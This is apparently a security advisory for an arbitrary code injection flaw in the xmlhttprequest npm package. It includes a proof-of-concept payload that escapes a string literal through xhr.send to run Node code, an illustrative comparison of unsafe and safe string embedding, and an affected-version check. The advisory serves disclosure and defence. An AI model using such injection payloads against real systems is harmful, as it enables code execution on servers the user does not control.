SNYK-JS-XMLHTTPREQUEST-1082935 PUBLISHED CVSS 8.1 HIGH

## Overview

[xmlhttprequest](https://github.com/driverdan/node-XMLHttpRequest) is a wrapper for the built-in http client to emulate the browser XMLHttpRequest object.

Affected versions of this package are vulnerable to Arbitrary Code Injection. When requests are sent synchronously (the `async` argument of `xhr.open` set to `false`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run.

### POC

```js
const { XMLHttpRequest } = require("xmlhttprequest")
const xhr = new XMLHttpRequest()
xhr.open("POST", "http://localhost.invalid/", false /* synchronous request */)
xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//")
```

## Remediation

Upgrade `xmlhttprequest` to version 1.7.0 or higher.

## References

- [GitHub Commit #1](https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6)
- [GitHub Commit #2](https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291)
- [Vulnerable Code](https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480)
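The block below is an added illustration of the vulnerability class behind this advisory; it is not code from the advisory or from the xmlhttprequest project. It models what happens when caller-supplied request data is embedded in generated JavaScript source (the synchronous code path builds such a script) by plain string concatenation, beside the hardened embedding via `JSON.stringify`, which is the approach the remediation commits take. `naiveEmbed` is an assumed stand-in for escaping by string replacement, not a copy of the linked vulnerable code; `PAYLOAD` is a constructed string in the shape of the POC with a harmless stub function in place of `require`; `isAffectedVersion` applies the advisory's stated fix threshold of 1.7.0.

```javascript
// Added example, not the xmlhttprequest project's code. Shows why data
// concatenated into generated JavaScript source can become code, and how a
// proper string literal (JSON.stringify) keeps it as data.

// Assumed naive embedding: wrap the data in single quotes and escape only
// the single quotes. A backslash in front of the quote neutralises the
// escape, so the literal is terminated early.
function naiveEmbed(data) {
  return "req.write('" + data.replace(/'/g, "\\'") + "');";
}

// Hardened embedding: JSON.stringify emits a complete, correctly escaped
// JavaScript string literal, so no content of `data` can end the literal.
function safeEmbed(data) {
  return "req.write(" + JSON.stringify(data) + ");";
}

// Execute a generated script against stubs. `req.write` records what arrives
// as data; `injected` records whether part of the data ran as code.
function runGenerated(source) {
  const result = { written: null, injected: false };
  const req = { write(d) { result.written = d; } };
  const injected = () => { result.injected = true; };
  new Function("req", "injected", source)(req, injected);
  return result;
}

// Constructed payload in the shape of the advisory's POC: a backslash, a
// quote to close the literal, a statement, and a comment to swallow the rest.
// The dangerous `require(...)` of the POC is replaced by the harmless stub.
const PAYLOAD = "\\');injected();//";

// Returns both outcomes so the difference can be inspected side by side.
function compareEmbeddings(data = PAYLOAD) {
  return {
    naive: runGenerated(naiveEmbed(data)),
    safe: runGenerated(safeEmbed(data)),
  };
}

// True when the installed xmlhttprequest version is below the fixed 1.7.0.
function isAffectedVersion(version) {
  const parts = version.split(".").map(Number);
  const fixed = [1, 7, 0];
  for (let i = 0; i < fixed.length; i++) {
    const v = parts[i] || 0;
    if (v < fixed[i]) return true;
    if (v > fixed[i]) return false;
  }
  return false;
}

const outcome = compareEmbeddings();
console.log("naive embedding ran injected code:", outcome.naive.injected);
console.log("safe embedding delivered the whole payload as data:",
  outcome.safe.written === PAYLOAD && !outcome.safe.injected);
console.log("1.6.0 affected:", isAffectedVersion("1.6.0"),
  "| 1.7.0 affected:", isAffectedVersion("1.7.0"));
```

Run with `node` and no dependencies. In the naive case only the single backslash reaches `req.write` and the stub `injected` is called, which is the code-injection outcome the advisory describes; in the hardened case the entire payload, including its quote and comment characters, arrives intact as the request body. For a dependency audit, `isAffectedVersion` is the check to run against the resolved version in the lock file.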

Risk Scores

CVSS v3.1
8.1
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
